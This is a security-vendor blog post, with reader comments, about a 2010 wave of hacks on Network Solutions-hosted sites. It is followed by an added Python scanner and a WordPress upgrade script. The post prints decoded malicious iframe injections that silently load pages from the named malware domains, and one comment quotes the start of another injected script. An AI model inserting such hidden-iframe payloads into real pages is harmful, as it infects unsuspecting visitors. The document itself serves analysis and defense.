Network Solutions hacked again

Network Solutions is getting hacked again. Just today we were notified of more than 50 sites compromised with the following malicious JavaScript:

Decoding this JavaScript shows that it injects the following iframe, which loads content from http://corpadsinc.com/grep/:

document.write (s) < iframe frameborder="0" onload=' if (!this.src){ this.src="http://corpadsinc.com/grep/"; this.height=0; this.width=0;} '

Note that this time we are seeing all kinds of sites hacked, from WordPress and Joomla installs to plain HTML sites.

UPDATE 1: Google is already blacklisting lots of them… Bad day to be a Network Solutions customer.

UPDATE 2: Some sites are also compromised with this encoded JavaScript:

It injects an iframe from the http://mainnetsoll.com/grep/ domain (the same domain used in last week's attack):

iframe frameborder="0" onload=' if (!this.src){ this.src="http://mainnetsoll.com/grep/"; this.height=0; this.width=0;} '

UPDATE 3: Some WordPress sites we were analyzing only had the malware inserted in the cache files generated by WP-Super-Cache. Everything else was clean.

UPDATE 4: Post from http://stopmalvertising.com explaining their findings on this issue.

UPDATE 5: Network Solutions updated their blog apologizing to their clients and saying that they are working hard to fix it. Hopefully it will be solved soon.
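A scanner for the injection described above, added here as an example and not part of the Sucuri post. It looks for the decoded hidden-iframe pattern (src set in onload, then height and width zeroed) and the two domains named above, in the file types the post and its updates report as hit (index.* and default.html, any .php/.html, and WP-Super-Cache output under wp-content/cache); the domain list, file selection and sample inputs are assumptions to adjust for your own host.

```python
"""Added example (not from the Sucuri post): scan a web root for the injection
described above.  Looks for the hidden-iframe onload pattern
(if(!this.src){ this.src=...; this.height=0; this.width=0 }) and the two domains
the post names, in the files the post and its updates say were hit: index.* and
default.html, any .php/.html, and WP-Super-Cache output under wp-content/cache.
Hits after the closing </html> tag are flagged (appended-injection pattern).
Domain list and file selection are assumptions; adjust them for your host."""
import os
import re
from dataclasses import dataclass
from typing import List

# Shape of the decoded iframe payload: src set in onload, then size zeroed.
IFRAME_RE = re.compile(
    r"""this\.src\s*=\s*["'][^"']+["'];\s*this\.height\s*=\s*0;\s*this\.width\s*=\s*0""",
    re.IGNORECASE)
# Domains named in the post (constructed list; extend with your own indicators).
DOMAIN_RE = re.compile(r"corpadsinc\.com/grep|mainnetsoll\.com/grep", re.IGNORECASE)
SCAN_EXT = {".php", ".html", ".htm"}

@dataclass
class Hit:
    path: str
    line: int
    reason: str
    after_html_close: bool  # True when the match sits after the last </html>

def wanted_path(path: str) -> bool:
    # Cache output, index.*/default.html, and any php/html file are scanned.
    name = os.path.basename(path).lower()
    if "/wp-content/cache/" in path.replace(os.sep, "/").lower():
        return True
    if name.startswith("index.") or name == "default.html":
        return True
    return os.path.splitext(name)[1] in SCAN_EXT

def scan_text(text: str, path: str = "<memory>") -> List[Hit]:
    close = text.lower().rfind("</html>")
    hits = []
    for rx, why in ((IFRAME_RE, "hidden-iframe onload payload"),
                    (DOMAIN_RE, "known malware domain")):
        for m in rx.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            hits.append(Hit(path, line, why, close != -1 and m.start() > close))
    return hits

def scan_tree(root: str) -> List[Hit]:
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            if wanted_path(p):
                with open(p, "r", encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_text(fh.read(), p))
    return sorted(hits, key=lambda h: (h.path, h.line))

# Constructed samples (not captured files) mirroring the decoded payload above.
SAMPLE_CLEAN = "<html><body><p>hello</p></body></html>\n"
SAMPLE_INFECTED = SAMPLE_CLEAN + (
    "<iframe frameborder=\"0\" onload=\"if(!this.src){"
    "this.src='http://corpadsinc.com/grep/'; this.height=0; this.width=0;}\">"
    "</iframe>\n")

if __name__ == "__main__":
    import sys
    for h in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{h.path}:{h.line}: {h.reason}", "(after </html>)" if h.after_html_close else "")
```

Run it against a copy of the web root rather than the live files, and treat a hit after `</html>` as a pointer to look for the injecting script (a CGI or cache writer), not only the infected page.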

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

69 comments
  1. I've been hacked. Happened around 2:40 PM on my NS Shared.

    They are hitting WordPress index.php files.

  2. They've inserted coded script in the following.

    index.php
    wp-content/index.php
    wp-content/themes/index.php
    wp-content/plugins/index.php
    wp-admin/index.php

    4/18/2010 at 2:54 PM

  3. My ftp password didn't get changed, but all my index.* files have had code inserted into them. Vanilla html, no WordPress, etc.

  4. Update — a file named default.html also was affected on my site. Anybody have any other file names affected?

  5. So what are the steps at least for now to get our site back to normal?

    And what do we need to do to prevent this and similar hacks in the future?
    Do we need to make our permissions tighter, and if we do what files specifically without interfering with our server's and wordpress' communications and updates?

  6. man… this has been going on for weeks. The solution? Ditch Network Solutions… their security sucks and they are always getting hacked.

    -pissed developer.

  7. My NS site was hacked twice.
    It doesn't help that NS doesn't seem to promptly offer updated WP installs on their hosting.
    I'm not particularly savvy on updating WP, and many others are not either. It would help if at least WP didn't serve up old outdated versions of WP.

  8. It is not a WordPress problem. NS security was compromised. They also restored malware from backups in some cases.

    A fresh install is always good but won't work if the main security is compromised.

    Upgrading WP is usually easy since 2.7 something. However, that does not touch the wp-content folder (themes or uploads), which are likely malware locations.

  9. Indeed, NS is hiding behind a veil of distrust and not respecting their customer base that was affected, me included. I have issued at least 6 service requests in the past two weeks only to get boilerplate emails that the issue has been resolved, when my questions were never answered.

    Vanilla html was affected this time, and FTP passwords were compromised. NS can't blame WordPress this time around, shame on NS for not taking responsibility for their own security. Now thousands of sites have lost revenue due to their security issues. Web servers were compromised across several sectors of their farm, and somehow I think it may be an internal issue.

    With respect to WP upgrades, I upgrade my installations manually since NS does not keep the latest version immediately available.
    1. Download the latest WP update from the WP update site and unzip.
    2. Back up your entire blog folder to a remote location, then delete the wp-includes folder and all contents, wp-admin folder and all contents, and delete all files in the root of the blog directory with the exception of wp-config.php file. If you have any other manually edited files such as an .htaccess file you will want to save that one also.
    3. Copy the new WP version folders wp-admin, wp-includes and all new files to the root directory except the wp-config.php file.
    4. Log into your blog and then check that all your plug-ins are updated and update those also. Then re-activate all your plug-ins.

    Hope that helps!
    Regards,
    ET
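The manual upgrade steps in the comment above, as an added example script (not the commenter's own code). It assumes three paths you supply: the unzipped release (the "wordpress" folder from the zip), the live blog root, and a backup location; wp-config.php and .htaccess are kept, the rest of the root plus wp-admin and wp-includes is replaced, and wp-content is left alone as the steps say, so it still needs its own malware check. The demo tree it builds is constructed, not a real install.

```python
"""Added example (not the commenter's own code): the manual upgrade steps in the
comment above as a script.  Assumes three paths you supply: the unzipped release
(the "wordpress" folder from the zip), the live blog root, and a backup location,
ideally off-host.  wp-config.php and .htaccess stay; wp-content is left alone."""
import os
import shutil
import tempfile
from typing import Dict, List, Optional

KEEP_IN_ROOT = {"wp-config.php", ".htaccess"}
CORE_DIRS = ("wp-admin", "wp-includes")
SKIP_FROM_RELEASE = {"wp-config.php", "wp-config-sample.php", "wp-content"}

def remove_old_core(blog: str) -> List[str]:
    # Step 2b: delete core dirs and every root file except the preserved ones.
    removed = []
    for d in CORE_DIRS:
        if os.path.isdir(os.path.join(blog, d)):
            shutil.rmtree(os.path.join(blog, d))
            removed.append(d)
    for name in os.listdir(blog):
        if os.path.isfile(os.path.join(blog, name)) and name not in KEEP_IN_ROOT:
            os.remove(os.path.join(blog, name))
            removed.append(name)
    return sorted(removed)

def install_new_core(new: str, blog: str) -> List[str]:
    # Step 3: copy the release in, skipping its config files and wp-content so
    # the preserved wp-config.php and the existing uploads are not overwritten.
    copied = []
    for name in sorted(os.listdir(new)):
        if name in SKIP_FROM_RELEASE:
            continue
        src, dst = os.path.join(new, name), os.path.join(blog, name)
        if os.path.isdir(src):
            shutil.copytree(src, dst, dirs_exist_ok=True)
        else:
            shutil.copy2(src, dst)
        copied.append(name)
    return copied

def manual_upgrade(new: str, blog: str, backup: str) -> Dict[str, List[str]]:
    for must in (os.path.join(new, "wp-settings.php"), os.path.join(blog, "wp-config.php")):
        if not os.path.isfile(must):
            raise ValueError("missing " + must)
    shutil.copytree(blog, backup, dirs_exist_ok=True)  # step 2a: back up first
    return {"removed": remove_old_core(blog), "installed": install_new_core(new, blog)}

def read_text(*parts: str) -> Optional[str]:
    p = os.path.join(*parts)  # helper for checking results; None if file absent
    return open(p).read() if os.path.isfile(p) else None

def make_demo_tree() -> Dict[str, str]:
    # Constructed throwaway tree: a fake release and a fake infected blog.
    base = tempfile.mkdtemp(prefix="wp-upgrade-demo-")
    files = {"new/wp-settings.php": "new", "new/index.php": "new", "new/wp-config-sample.php": "sample",
             "new/wp-admin/index.php": "new", "new/wp-includes/version.php": "new",
             "blog/wp-settings.php": "old", "blog/index.php": "infected", "blog/default.html": "infected",
             "blog/wp-config.php": "config", "blog/.htaccess": "ht", "blog/wp-admin/index.php": "infected",
             "blog/wp-includes/version.php": "old", "blog/wp-content/uploads/a.jpg": "up"}
    for rel, body in files.items():
        os.makedirs(os.path.dirname(os.path.join(base, rel)), exist_ok=True)
        with open(os.path.join(base, rel), "w") as fh:
            fh.write(body)
    return {k: os.path.join(base, k) for k in ("new", "blog", "backup")}
```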

  10. My vanilla html site has now had malicious code inserted 6 times in the last 24 hours. Their tech support has nothing helpful to say. I have now pulled my site down altogether as I can't otherwise prevent my (largely un-tech-savvy) visitors from the threat posed by this code.

  11. I was hit as well. I'm running Joomla, and the index.php file was altered with the JS. Also, index files were created in subfolders, "images" for example, where they did not exist previously. I changed all ftp pws and it stopped.

  12. Another vanilla html site was hit. I removed the malicious code and am waiting for the following attack, I suppose. Some weeks ago our ftp passwords were also compromised. It is not the first time NS was attacked. And apparently all kinds of sites are attacked. I will advise my clients to change provider. It seems to be the only real solution.

  13. We use Network Solutions as our hosting and email provider but unlike the rest of you, our website was unaffected. Our problem is that our email stopped working last Friday and I am wondering if this had anything to do with the hack. It took me 15 phone calls for them to explain that we had violated their TOS agreement for spamming. It's funny that we don't advertise via email but through direct mail. So WITHOUT ANY NOTIFICATION, they shut down our pop services and have crippled our business. They also have not provided any proof to these accusations which makes me incredibly irate. We have been using Network Solutions for around 60 days now, and in 15 years of using our last provider, we have never experienced any issues whatsoever. We needed to switch because we needed a Windows platform. I also find out that we can send mail but cannot receive it. I would think that due a spamming violation, the opposite would happen. Cannot send but can receive. What do you guys think about this? I think it should be passed on to legal.

  14. I am new to NS. I've been developing my new project for 75 days and haven't even officially deployed my site yet; it's in "In Production Mode" when you go to my URL. I was affected by the breach-hacks.

    I thought NS would be a real safe and secure choice with all the big name sites and blogs using them and assumed they had top notch security for customers.

    Guess I misjudged that decision.

  15. This is the form email I received when I notified Network Solutions on 4/11 that I thought something fishy was going on with one of my sites:

    Thank you for contacting Network Solutions Customer Service Department. We are committed to creating the best Customer experience possible. One of the first ways we can demonstrate our commitment to this goal is to quickly and efficiently handle your recent request. We apologize for any inconvenience this may have caused you. Based on your concern, proponents of malware commonly look for websites with vulnerabilities. These include weak passwords, third party applications that are not up to date or sometimes weakness could emanate from lack of updated anti-virus software on PCs. A large part of preventing these events comes from users taking preventive steps such as:

    - Routinely change passwords including FTP/blog/content management software
    - Update your blog/content management software to the latest version.
    - Update any plug-ins or 3rd party scripts or code you may have for your website
    - Update firewalls & anti-virus on your local PCs.
    - Make sure your file permissions are set correctly and do not allow unauthorized access.

    This is not an exhaustive list and these incidents can happen for a number of reasons. Just cleaning it once is not enough to resolve this. You should always take precautions.

  16. What irritates me the most is the shield of secrecy that NS operates under. Why don't they come out and own the fact that they've been hacked? I host more than 15 sites on NS and have been with them for over 10 years. But have always found their service below par. They try to blame YOU for all their own shortcomings (as I read above in the 'email-not-working' case and the security 'advisory' mail sent to another helpless complainant).

    Hey, Shashi Bellamkonda… are you reading this? We're all eagerly awaiting your response on all this… Mr. netsolcares!!!

    Shit happens… at least be honest about it!

    Shame on NS!

  17. web-search.com hacked again at 7:58am server time 4/22
    I took most stuff down for now.
    All cgi removed 2 weeks ago just in case.

    The worst part of all this is NS tried to tell me I had a problem with my content when I first told them about it 17 days ago.
    All the while knowing that many others had the same problem.
    I spend hours going through everything and kept getting hacked.
    If NS had been honest, I'd have saved countless hours trying to fix something I had no control over.
    Just a comment: Why is it when I do searches for hacks, there are references all over the place to fileman.cgi which NS uses?

    Not a happy camper.
    Bob

  18. BTW Does anyone know how long it takes for pages that have been removed due to this hack, to be deleted from search results?

  19. Hey Everybody, I have a straight up HTML site that kept having the index.html altered. I tried putting a redirect meta in the page code to prevent it from loading the malicious script, but a meta redirect still loads up to the body and the code is being inserted after the meta tags. My solution is to set up a 301 redirect (see: http://www.isitebuild.com/301-redirect.htm ) in .htaccess. That way the server never sends index.html to the requestor and replaces it with whatever page you put in the redirect page section of .htaccess. Hope this helps anyone. I'm super pissed @ NetSol, but pre-paid for 1 year hosting and can't back out now…

  20. It also works for crawlers… so search engines won't see the malicious code and knock you down the ratings board 🙂

  21. Network Solutions should make all this "right" somehow. This has not been funny for any of us.
    Over 2 weeks of this — so far.

  22. My html web site has been hit too. It seems to be a new exploit they are using. It's some sort of PDF vulnerability.

    I called tech support and they said it could be 24 to 48 hours. My response was "why the hell have you not unplugged the server???" They are spreading virus all over the place while they attempt to fix it. Unplug the damn servers until the problem is fixed!!!

  23. Jumped ship myself…hosted a fair few sites over the years with a fair few hosts…but NetSol have proved to be by far the worst. This has really been the final straw with these guys.

  24. My sites attacked again during the night (early am 4/23)
    But now I'm unable to use ftp on ANY of my servers (3)
    Before it was just one affected.

    This is far from over.
    Oh btw, form letter from NS saying they found no bad code on the example I sent them.
    Is anyone even checking?

    Bob

  25. I caught the issue on my client's site. Unfortunately since we take very sensitive information from their customers I couldn't just change the code and be happy, so unfortunately I have been up all night (caught the issue at midnight and after 6 hours getting it all fixed, transferring all files, database, and DNS records over to a dedicated server), and I finally get to go to bed!

  26. Finally got back into my NS file manager today after waiting since Tues for them to fix things.

    My index files are hacked with script again.

  27. I don't know what to do. I'm two months into a NS shared hosting one year package. In production (a start up), not even public yet. I take security seriously, do scans daily, firewall, backups nightly, don't store info in my SFTP program, log in manually each time when I use SFTP, etc., etc. It's full time work. I am getting killed by these hacks.

  28. Still happening at 1430 CST. Had a new type of script inserted in a bait index.html page. This script starts out as "var gID=new Date();var kK=false;var dKA;var cNM;if(cNM!='xYN' && cNM != ''){cNM=nul"

  29. Still happening as of 1430 CST. Hit a bait index.html file. New script being used I think, it starts out as "Xvar gID=new Date();var kK=false;var dKA;var cNM;if(cNM!='xYN' && cNM != ''){cNM=nulX" but without the X's

  30. Still happening at 1430 CST . . .

    It's out of control obviously. What are we supposed to do? This is insane I didn't pay for this or deserve this.

    Steve

  31. @Steve, what is your site name?

    I'm not public yet. I already scanned them today with the Sucuri scanner with production – maintenance mode disabled and they came up RED. I was hacked last Sunday, we restored the database Monday. I made backups of the restored sites. Everything looked clean. They are still clean locally. Finally was able to get back into NS file manager today. First thing I noticed was a weird modify and I opened it up and it was hacked. Also on my SMF forum.

  32. Site seems ok now but interesting problem.
    I can log into file manager and manage account just fine but not using WS-FTP program on my computer. Passwords are fine as they are the same as file manager at NS.
    Any thoughts?
    Is NS blocking outside programs at this moment?

    Bob

  33. Has anyone had their site blacklisted by google?? I ran sucuri scanner and came up negative, changed password, and deleted old files in server. I then uploaded new clean files. what is the turn around time for google to de-blacklist you and get your site up again in search results?? this is killing us!!

  34. Using the Google tool it took me about 24 hours or less to get the black listing taken off. You do need to verify you own the site to get them to do anything. It's as simple as adding a google code to your index page.

    BTW This is funny as hell to me at least. This is the current message I get when logging into file manager right now.

    "This Connection is Untrusted

    You have asked Firefox to connect
    securely to http://www.networksolutions.com, but we can't confirm that your connection is secure.

    Normally, when you try to connect securely,
    sites will present trusted identification to prove that you are
    going to the right place. However, this site's identity can't be verified."

  35. Details of above:

    http://www.networksolutions.com uses an invalid security certificate.

    The certificate is not trusted because the issuer certificate has expired.
    The certificate will not be valid until 1/21/2009 7:00 PM.

    (Error code: sec_error_expired_issuer_certificate)

  36. Certificate is now fixed but still not able to get in using WS-FTP
    Have to use web based system at NS

    Bob

  37. Would someone from Sucuri contact them and find out if this is going to be fixed or is some new process now in place?
    I notice that to use file manager now there are now two layers to go through to get to files. Perhaps this is a solution they've decided to implement?

    Bob

  38. After searching through most of the night I found our problem at the bottom of counter.cgi in the cgi-bin directory. It was injecting the malware script into all php pages (not just wordpress) after the final HTML tag. Removed it and now we're coming up clean on the sucuri scanner.

    I'm not very happy with NS right now.

    Tobin

  39. I'm on shared hosting. I was hit last Sunday. And again yesterday. I'm wondering if poorly maintained blogs (or even abandoned) on this setup might be part of the problem. NS should check all shared hosting blogs with some kind of automated checking system and notify these owners that "we've noticed you haven't logged in to your account for 30 days.
    We have sent you important security notifications please check your in box." If these blogs are infected and launching these attacks, those of us who are on top of things pay the price.

    There should be some kind of requirement that shared hosting blog owners have to maintain proper security with no exceptions. That's not too much to ask. If they can not they should get a free blog setup where they don't have to deal with maintenance.

  40. Anyone have any idea when the nearly constant resetting of passwords will end?
    Wouldn't be so bad but there is no notification it's going to happen. You only find out by logging in as admin when your ftp program fails

    Bob

  41. No clue Bob.

    I can't even set my proper file permissions and make them stick for my own installs either.

    Apparently the only winning move at this point is not to play.

  42. Aren't we all getting tired of these message:

    [10:17:37 AM] Bob Bradley: ALERT: An important message from Network Solutions Customer Service

    We are currently experiencing high call volumes and you may experience longer hold times. You may also experience delays in making modifications to your account or website or even making account level changes or updates. We are aware of these issues, and our Engineers are working diligently to resolve the matter.

  43. PS I tried using file manager to set permissions but like you, it isn't changing.
    WS-FTP works "some" of the time but you almost have to sit on it to get anywhere.
    Very unproductive to say the least.

    Don't even think about calling. lol

    Bob

  44. I am using WordPress Bob and they aren't being much help either.

    If you're not part of the WordPress "Club" apparently we're on our own.

  45. Now I can't even upgrade and remove plugins or change permissions via file manager.

  46. My html web site is still totally down. Also, their main web page at networksolutions.com was serving virus at 3:15pm pacific time on 4-26-10. It's fixed now. I wish they would fix my site so quickly.

  47. Our site has been hacked 3 times now in the last four weeks. I have changed every password at least three times (and some four). It happened again last night with a different php code than before. All FTP passwords were reset (I assume by Netsol) so they must know what is happening. No official word from anybody and I can't wait on hold until they answer.

  48. I have used network solutions for several years to manage my domains, the service had been good up to 3 weeks ago when it went bang!

    1. I get an email alert that a .es domain was due to be renewed.
    2. I renewed the domain.
    3. I get my payment returned 2 days later, no explanation!
    4. I contact support (this is so backward a support system it is unbelievable).
    5. They inform me 2 days later that the domain needs to be renewed 57 days before it expires.
    Note the domain was renewed by me when they informed me it needed to be renewed!
    6. I get another email alert to renew the domain * right away * or I would lose it.
    7. I renew the domain name * for the second time *
    8. I receive the confirmation from Pay pal for the payment * no details just the total charged *
    9. I report this and the fact the domain renewal is in a mess to network support.
    9. I get a call from support and after talking to them for 20 minutes they tell me there is a problem in the system, the domain has been activated again and they are very sorry for this.
    10. I get a call 15 minutes later from another support person telling me the problem is not sorted and I need to pay for the domain renewal, after I explain the whole thing again they tell me the domain needs to be renewed 57 days before it expires. I end being told they will contact me again.
    11. I send another message to support outlining this problem and that I need to get this sorted, the domain is not activated (1 week the domain is not available now).
    12. I get another call from support to tell me everything they told me before, I tell them the domain is not activated and they said it is and if it the site is not available the problem is with my hosting company. I know the problem is not with my hosting company because I run the server!
    I ask to speak to a manager.
    13. I eventually get a manager (!), first thing he says is…. You have some questions on the legalities of….., I stop him and explain the situation, he starts the whole 57 day story…. again!
    14. I explain the same points I sent in the email, the manager answers… oh I see, I see!!!! I explain the renewal emails they sent out and that I renewed when these arrived…. yes I see, I see that here!!!!
    15. The manager goes on to tell me the user agreement states …. 57 days……..
    16. I explain if the domain needs to be renewed 57 days before it expired then they should send the renewal emails out before that period and not a couple of weeks before the expire period….. the guy starts to seem to understand, tells me he will see what he can do and get back to me. I explain the site is now down a week because of this and I need it sorted out * now *, he said he will get back to me or I should call them back!!!!
    17. 2 days later I get an email from Network Solutions telling me my second renewal for the domain has been refunded to my account, no explanation…..

    This is still all going on, I now have a web site that has been down for a week and will be until they get this sorted. If a .es domain needs to be renewed 57 days before it expires then they should send the renewal alert emails out before that period and not after it has passed. One of the main reasons I am with network solutions was because one of their selling points is they will alert you when a renewal is due! And guess what, I am still asked to renew the domain on my network solutions account, bad, bad, bad service.

    If anyone wants a professional domain management company then don't look at network solutions because professional it is not and they certainly do not understand the importance of the service they are advertising to do.
